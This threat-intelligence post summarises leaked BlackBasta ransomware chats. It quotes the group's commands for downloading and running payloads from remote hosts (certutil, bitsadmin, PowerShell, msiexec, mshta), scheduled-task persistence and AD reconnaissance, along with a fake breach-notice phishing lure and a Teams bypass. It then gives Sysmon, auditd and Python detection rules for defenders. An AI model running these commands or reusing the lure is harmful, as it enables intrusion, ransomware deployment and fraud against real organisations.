Like a lot of threat actors, BlackBasta heavily used LOLBins in their attacks. Here are a few examples:
Certutil
certutil -urlcache -split -f https://REDACTED/gm68CGjX C:\Users\Public\payload.exe
WMIC
WMIC /Namespace:\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState /Format:List
Bitsadmin
bitsadmin /transfer payload https://REDACTED/gKWi39HB C:\Users\Public\malware.exe
Schtasks
schtasks /create /sc onlogon /tn UpdateTask /tr "C:\Users\Public\malware.exe" /ru SYSTEM /f
PowerShell – AD Recon
powershell -c "$D=[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain();$L='LDAP://'.$D;$D = [ADSI]$L;$Date = $((Get-Date).AddDays(-90).ToFileTime());$str = '(&(objectcategory=computer)(|(lastlogon>='+$Date+')(lastlogontimestamp>='+$Date+')))';$s = [adsisearcher]$str;$s.searchRoot = $L.$D.distinguishedName;$s.PageSize = 10000;$s.PropertiesToLoad.Add('cn') > $Null;Foreach ($CA in $s.FindAll()){;$i++;}; Write-Output Total computers: $i"
PowerShell – Download Malicious DLL
powershell iwr http://REDACTED:801/download/HK_DNS_x64_n1_x64_inf.dll -outfile C:\Users\Public\HK_DNS_x64_n1_x64_inf.dll
MSIExec
msiexec /i https://REDACTED/gH4TzsYk /quiet /qn /norestart
Cscript / Wscript
cscript C:\Users\Public\payload.vbs
wscript C:\Users\Public\payload.vbs
MSHTA
mshta https://REDACTED/g_z3-eZh
Rundll32
rundll32.exe C:\users\public\35S44386.xls,ReleaseImage
RMM Tools
The dataset also mentions the usage of the following RMM tools:
– AnyDesk
– TeamViewer
– Syncro
– Wise RMM
– Tactical RMM
– MeshCentral
Example from the logs:
Russian: “вы какой rmm юзали ? синкро и вайз Сейчас доступ на синкро сохранился”
English: “What rmm did you use? syncro and wise Now access to syncro is preserved”
Initial Access
Stolen credentials and credential stuffing were discussed, including against RDP, VPN and cPanel.
Phishing with fake data breach notifications:
“We will use our spam engine, the one we used to infect you in the first place, sending a neat, nicely written message:
Hello, this is Whafh – we are sending a follow up to the recent email on disclosing a data breach (because I am sure you sent one to your clients as you are obligated by the law to do so).
In the attached document, you can see further information about the breach, and an audit of exposure.”
MSTeams Social Engineering
Sending target user MRI TWICE to create a “group chat” in order to bypass “external user message approval” prompt
See https://REDACTED/gjAMU_V4
0-Days
The group also mentioned leveraging several of the larger 0-day exploits targeting network devices from the past few months:
– Juniper SRX Firewall Unauthenticated RCE
– SonicPanel RCE
– Palo Alto 0-day CVE-2024-3400 back in April. They were offering a working exploit for 15k.
What Undercode Say
The BlackBasta group’s use of LOLBins (Living Off the Land Binaries) highlights the importance of monitoring legitimate system tools for malicious activity. Certutil, WMIC, Bitsadmin, and PowerShell are often exploited by attackers to download payloads, execute commands, and perform reconnaissance. Defenders should focus on detecting anomalous usage of these tools, such as Certutil being used to download files from external URLs or PowerShell executing unusual scripts.
For Linux defenders, similar techniques can be detected using tools like `auditd` to monitor command-line activity:
auditctl -a always,exit -F arch=b64 -S execve -k suspicious_commands
Windows defenders can use Sysmon to track LOLBin usage. The fragment below belongs inside the EventFiltering section of a Sysmon configuration; note that a bare match on "powershell" will fire on every legitimate script, so tune it to the arguments seen above (for example -urlcache, /transfer, iwr with -outfile into C:\Users\Public) before relying on it for alerting:
<RuleGroup name="" groupRelation="or">
  <ProcessCreate onmatch="include">
    <CommandLine condition="contains">certutil</CommandLine>
    <CommandLine condition="contains">bitsadmin</CommandLine>
    <CommandLine condition="contains">powershell</CommandLine>
  </ProcessCreate>
</RuleGroup>
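As an added example (not from the leak or from Undercode), the following Python script turns the command-line patterns quoted above into detection rules and runs them over a handful of constructed process-creation events; the URLs and file names in the sample events are placeholders, and two benign admin commands are included to show the rules do not fire on ordinary certutil or msiexec use.

```python
import re

# Constructed sample process-creation command lines (placeholders, not leak data).
SAMPLE_EVENTS = [
    r'certutil -urlcache -split -f https://example.invalid/abc C:\Users\Public\payload.exe',
    r'bitsadmin /transfer payload https://example.invalid/xyz C:\Users\Public\malware.exe',
    r'schtasks /create /sc onlogon /tn UpdateTask /tr "C:\Users\Public\malware.exe" /ru SYSTEM /f',
    r'msiexec /i https://example.invalid/pkg /quiet /qn /norestart',
    r'mshta https://example.invalid/page',
    r'rundll32.exe C:\users\public\35S44386.xls,ReleaseImage',
    r'powershell iwr http://example.invalid:801/download/x.dll -outfile C:\Users\Public\x.dll',
    r'certutil -hashfile C:\Windows\System32\kernel32.dll SHA256',   # benign: hashing a file
    r'msiexec /i C:\Temp\vendor-tool.msi /quiet',                    # benign: local package
]

URL = r'https?://'
# (rule name, regex). Each rule keys on the argument that makes the LOLBin use suspicious,
# not on the binary name alone, to keep false positives down.
RULES = [
    ("certutil_url_download",   re.compile(r'\bcertutil\b.*-urlcache.*' + URL, re.I)),
    ("bitsadmin_url_transfer",  re.compile(r'\bbitsadmin\b.*/transfer.*' + URL, re.I)),
    ("schtasks_system_public",  re.compile(r'\bschtasks\b.*/create.*\\Users\\Public\\.*/ru\s+SYSTEM', re.I)),
    ("msiexec_remote_package",  re.compile(r'\bmsiexec\b.*/i\s+' + URL, re.I)),
    ("mshta_remote_url",        re.compile(r'\bmshta\b.*' + URL, re.I)),
    ("rundll32_non_dll_module", re.compile(r'\brundll32(\.exe)?\s+\S+\.(xls|xlsx|doc|txt|png|jpg)\b', re.I)),
    ("powershell_dl_to_public", re.compile(r'\bpowershell\b.*\b(iwr|invoke-webrequest|downloadfile)\b.*\\Users\\Public\\', re.I)),
]

def classify(cmdline):
    """Return the names of every rule the command line triggers (empty list if none)."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(events):
    """Return (cmdline, rule names) for each event that triggers at least one rule."""
    hits = []
    for event in events:
        names = classify(event)
        if names:
            hits.append((event, names))
    return hits

if __name__ == "__main__":
    for cmd, names in scan(SAMPLE_EVENTS):
        print(", ".join(names), "<-", cmd)
```

Feed it real Sysmon Event ID 1 or EDR command lines instead of SAMPLE_EVENTS and extend RULES with the wscript/cscript and DLL-drop patterns above as your environment's baseline allows.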
For RMM tools, ensure that only authorized software is installed and monitor for unusual remote connections. Use firewall rules to restrict access to RMM tools from untrusted IPs.
Phishing remains a significant threat. Implement email filtering solutions and educate users on identifying suspicious emails. For MSTeams, enforce strict policies for external communication and monitor for unusual group chat creation.
Finally, patch management is critical to mitigate 0-day exploits. Regularly update network devices and apply vendor patches as soon as they are released. Use intrusion detection systems (IDS) to monitor for exploit attempts:
suricata -c /etc/suricata/suricata.yaml -i eth0
Stay vigilant and continuously update your defenses to counter evolving threats.